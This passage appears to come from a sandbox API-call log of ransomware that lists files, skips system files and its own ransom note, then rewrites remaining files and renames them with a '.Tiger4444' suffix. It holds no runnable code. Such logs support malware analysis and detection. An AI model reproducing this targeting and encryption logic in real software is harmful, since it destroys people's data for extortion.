ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea377ed3, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dll1", cAlternateFileName="")) returned 1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2="Tiger4444.exe") returned -1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2=".") returned 1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2="..") returned 1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2="windows") returned -1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2="bootmgr") returned 1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2="pagefile.sys") returned -1 [0038.574] lstrcmpiW (lpString1="dll1", lpString2="boot") returned 1 [0038.575] lstrcmpiW (lpString1="dll1", lpString2="ids.txt") returned -1 [0038.575] lstrcmpiW (lpString1="dll1", lpString2="NTUSER.DAT") returned -1 [0038.575] lstrcpyW (in: lpString1=0x30aead0, lpString2="dll1" | out: lpString1="dll1") returned="dll1" [0038.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0038.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72fc8 [0038.575] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664c8 | out: ListHead=0xc66828, ListEntry=0xc664c8) returned 0xc66528 [0038.575] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea37cd05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37cd05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea37cd05, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dll2", cAlternateFileName="")) returned 1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="Tiger4444.exe") returned -1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2=".") returned 1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="..") returned 1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="windows") returned -1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="bootmgr") returned 1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="pagefile.sys") returned -1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="boot") returned 1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="ids.txt") returned -1 [0038.575] lstrcmpiW (lpString1="dll2", lpString2="NTUSER.DAT") returned -1 [0038.575] lstrcpyW (in: lpString1=0x30aead0, lpString2="dll2" | out: lpString1="dll2") returned="dll2" [0038.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0038.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc73048 [0038.575] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc664c8 [0038.575] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea380798, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea380798, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x326c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="downloader.dll", cAlternateFileName="DOWNLO~1.DLL")) returned 1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="Tiger4444.exe") returned -1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2=".") returned 1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="..") returned 1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="windows") returned -1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="bootmgr") returned 1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="pagefile.sys") returned -1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="boot") returned 1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="ids.txt") returned -1 [0038.575] lstrcmpiW (lpString1="downloader.dll", lpString2="NTUSER.DAT") returned -1 [0038.575] lstrcpyW (in: lpString1=0x30aead0, lpString2="downloader.dll" | out: lpString1="downloader.dll") returned="downloader.dll" [0038.575] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\downloader.dll", dwFileAttributes=0x0) returned 1 [0038.605] lstrlenW (lpString="downloader.dll") returned 14 [0038.605] lstrlenW (lpString="Tiger4444") returned 9 [0038.605] lstrcmpiW (lpString1="oader.dll", lpString2="Tiger4444") returned -1 [0038.605] lstrlenW (lpString=".dll") returned 4 [0038.605] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0038.605] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea381b2a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea381b2a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x9d2c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="Tiger4444.exe") returned -1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2=".") returned 1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="..") returned 1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="windows") returned -1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="bootmgr") returned 1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="pagefile.sys") returned -1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="boot") returned 1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="ids.txt") returned -1 [0038.605] lstrcmpiW (lpString1="DW20.EXE", lpString2="NTUSER.DAT") returned -1 [0038.605] lstrcpyW (in: lpString1=0x30aead0, lpString2="DW20.EXE" | out: lpString1="DW20.EXE") returned="DW20.EXE" [0038.605] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DW20.EXE", dwFileAttributes=0x0) returned 1 [0038.606] lstrlenW (lpString="DW20.EXE") returned 8 [0038.606] lstrlenW (lpString="Tiger4444") returned 9 [0038.606] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0038.606] lstrlenW (lpString=".dll") returned 4 [0038.606] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0038.606] lstrlenW (lpString=".lnk") returned 4 [0038.606] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0038.606] lstrlenW (lpString=".ini") returned 4 [0038.606] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0038.606] lstrlenW (lpString=".sys") returned 4 [0038.606] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0038.606] CreateFileW (lpFileName="C:\\Windows10Upgrade\\DW20.EXE" (normalized: "c:\\windows10upgrade\\dw20.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0038.606] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0038.606] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13005909965) returned 1 [0038.606] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=643784) returned 1 [0038.606] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0038.606] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0038.606] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9d5d0, lpName=0x0) returned 0x2cc [0038.607] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d5d0) returned 0x31c0000 [0039.194] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0039.194] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0039.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0039.194] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0039.194] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0039.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0039.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0039.194] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13064737494) returned 1 [0039.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0039.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0039.194] UnmapViewOfFile (lpBaseAddress=0x31c0000) returned 1 [0039.200] CloseHandle (hObject=0x2cc) returned 1 [0039.200] CloseHandle (hObject=0x2c8) returned 1 [0039.214] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\DW20.EXE.Tiger4444") returned 38 [0039.214] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\DW20.EXE" (normalized: "c:\\windows10upgrade\\dw20.exe"), lpNewFileName="C:\\Windows10Upgrade\\DW20.EXE.Tiger4444" (normalized: "c:\\windows10upgrade\\dw20.exe.tiger4444"), dwFlags=0x1) returned 1 [0039.215] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=643792 | out: Addend=0xc6f980) returned 118496 [0039.215] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=588 | out: Addend=0xc6f98c) returned 238 [0039.215] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea385605, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea385605, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xc2c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWDCW20.DLL", cAlternateFileName="")) returned 1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="Tiger4444.exe") returned -1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2=".") returned 1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="..") returned 1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="windows") returned -1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="bootmgr") returned 1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="pagefile.sys") returned -1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="boot") returned 1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="ids.txt") returned -1 [0039.215] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="NTUSER.DAT") returned -1 [0039.215] lstrcpyW (in: lpString1=0x30aead0, lpString2="DWDCW20.DLL" | out: lpString1="DWDCW20.DLL") returned="DWDCW20.DLL" [0039.215] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DWDCW20.DLL", dwFileAttributes=0x0) returned 1 [0039.253] lstrlenW (lpString="DWDCW20.DLL") returned 11 [0039.253] lstrlenW (lpString="Tiger4444") returned 9 [0039.253] lstrcmpiW (lpString1="DCW20.DLL", lpString2="Tiger4444") returned -1 [0039.254] lstrlenW (lpString=".dll") returned 4 [0039.254] lstrcmpiW (lpString1=".DLL", lpString2=".dll") returned 0 [0039.254] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea386943, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea386943, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xb2c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="Tiger4444.exe") returned -1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2=".") returned 1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="..") returned 1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="windows") returned -1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="bootmgr") returned 1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="pagefile.sys") returned -1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="boot") returned 1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="ids.txt") returned -1 [0039.254] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="NTUSER.DAT") returned -1 [0039.254] lstrcpyW (in: lpString1=0x30aead0, lpString2="DWTRIG20.EXE" | out: lpString1="DWTRIG20.EXE") returned="DWTRIG20.EXE" [0039.254] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE", dwFileAttributes=0x0) returned 1 [0039.254] lstrlenW (lpString="DWTRIG20.EXE") returned 12 [0039.254] lstrlenW (lpString="Tiger4444") returned 9 [0039.254] lstrcmpiW (lpString1="RIG20.EXE", lpString2="Tiger4444") returned -1 [0039.254] lstrlenW (lpString=".dll") returned 4 [0039.254] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0039.254] lstrlenW (lpString=".lnk") returned 4 [0039.254] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0039.254] lstrlenW (lpString=".ini") returned 4 [0039.254] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0039.254] lstrlenW (lpString=".sys") returned 4 [0039.254] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0039.255] CreateFileW (lpFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE" (normalized: "c:\\windows10upgrade\\dwtrig20.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0039.255] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0039.255] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13070776899) returned 1 [0039.255] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=45768) returned 1 [0039.255] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0039.255] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0039.255] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb5d0, lpName=0x0) returned 0x2cc [0039.257] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb5d0) returned 0xc20000 [0039.466] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0039.466] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0039.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0039.466] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0039.466] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0039.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0039.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0039.466] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13091950244) returned 1 [0039.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0039.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0039.467] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0039.467] CloseHandle (hObject=0x2cc) returned 1 [0039.467] CloseHandle (hObject=0x2c8) returned 1 [0039.469] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\DWTRIG20.EXE.Tiger4444") returned 42 [0039.469] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE" (normalized: "c:\\windows10upgrade\\dwtrig20.exe"), lpNewFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE.Tiger4444" (normalized: "c:\\windows10upgrade\\dwtrig20.exe.tiger4444"), dwFlags=0x1) returned 1 [0039.470] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=45776 | out: Addend=0xc6f980) returned 762288 [0039.470] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=211 | out: Addend=0xc6f98c) returned 826 [0039.470] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea387cd0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea387cd0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EnableWiFiTracing.cmd", cAlternateFileName="ENABLE~1.CMD")) returned 1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="Tiger4444.exe") returned -1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2=".") returned 1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="..") returned 1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="windows") returned -1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="bootmgr") returned 1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="pagefile.sys") returned -1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="boot") returned 1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="ids.txt") returned -1 [0039.470] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="NTUSER.DAT") returned -1 [0039.470] lstrcpyW (in: lpString1=0x30aead0, lpString2="EnableWiFiTracing.cmd" | out: lpString1="EnableWiFiTracing.cmd") returned="EnableWiFiTracing.cmd" [0039.470] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd", dwFileAttributes=0x0) returned 1 [0039.471] lstrlenW (lpString="EnableWiFiTracing.cmd") returned 21 [0039.471] lstrlenW (lpString="Tiger4444") returned 9 [0039.471] lstrcmpiW (lpString1="acing.cmd", lpString2="Tiger4444") returned -1 [0039.471] lstrlenW (lpString=".dll") returned 4 [0039.471] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0039.471] lstrlenW (lpString=".lnk") returned 4 [0039.471] lstrcmpiW (lpString1=".cmd", lpString2=".lnk") returned -1 [0039.471] lstrlenW (lpString=".ini") returned 4 [0039.471] lstrcmpiW (lpString1=".cmd", lpString2=".ini") returned -1 [0039.471] lstrlenW (lpString=".sys") returned 4 [0039.471] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0039.471] CreateFileW (lpFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd" (normalized: "c:\\windows10upgrade\\enablewifitracing.cmd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0039.471] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0039.471] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13092405097) returned 1 [0039.471] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=9810) returned 1 [0039.471] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0039.471] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0039.471] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2960, lpName=0x0) returned 0x2cc [0039.472] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2960) returned 0xc20000 [0039.474] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0039.474] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0039.474] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0039.474] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0039.474] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0039.474] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0039.474] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.474] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0039.474] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13092716253) returned 1 [0039.474] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0039.474] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0039.474] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0039.475] CloseHandle (hObject=0x2cc) returned 1 [0039.475] CloseHandle (hObject=0x2c8) returned 1 [0039.476] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd.Tiger4444") returned 51 [0039.476] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd" (normalized: "c:\\windows10upgrade\\enablewifitracing.cmd"), lpNewFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd.Tiger4444" (normalized: "c:\\windows10upgrade\\enablewifitracing.cmd.tiger4444"), dwFlags=0x1) returned 1 [0039.476] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=9824 | out: Addend=0xc6f980) returned 808064 [0039.476] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 1037 [0039.476] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea389060, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea389060, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x10cc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESDHelper.dll", cAlternateFileName="ESDHEL~1.DLL")) returned 1 [0039.476] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.476] lstrcmpiW (lpString1="ESDHelper.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.476] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="Tiger4444.exe") returned -1 [0039.476] lstrcmpiW (lpString1="ESDHelper.dll", lpString2=".") returned 1 [0039.476] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="..") returned 1 [0039.477] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="windows") returned -1 [0039.477] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="bootmgr") returned 1 [0039.477] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="pagefile.sys") returned -1 [0039.477] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="boot") returned 1 [0039.477] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="ids.txt") returned -1 [0039.477] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="NTUSER.DAT") returned -1 [0039.477] lstrcpyW (in: lpString1=0x30aead0, lpString2="ESDHelper.dll" | out: lpString1="ESDHelper.dll") returned="ESDHelper.dll" [0039.477] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\ESDHelper.dll", dwFileAttributes=0x0) returned 1 [0039.477] lstrlenW (lpString="ESDHelper.dll") returned 13 [0039.477] lstrlenW (lpString="Tiger4444") returned 9 [0039.477] lstrcmpiW (lpString1="elper.dll", lpString2="Tiger4444") returned -1 [0039.477] lstrlenW (lpString=".dll") returned 4 [0039.477] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0039.477] FindNextFileW (in: 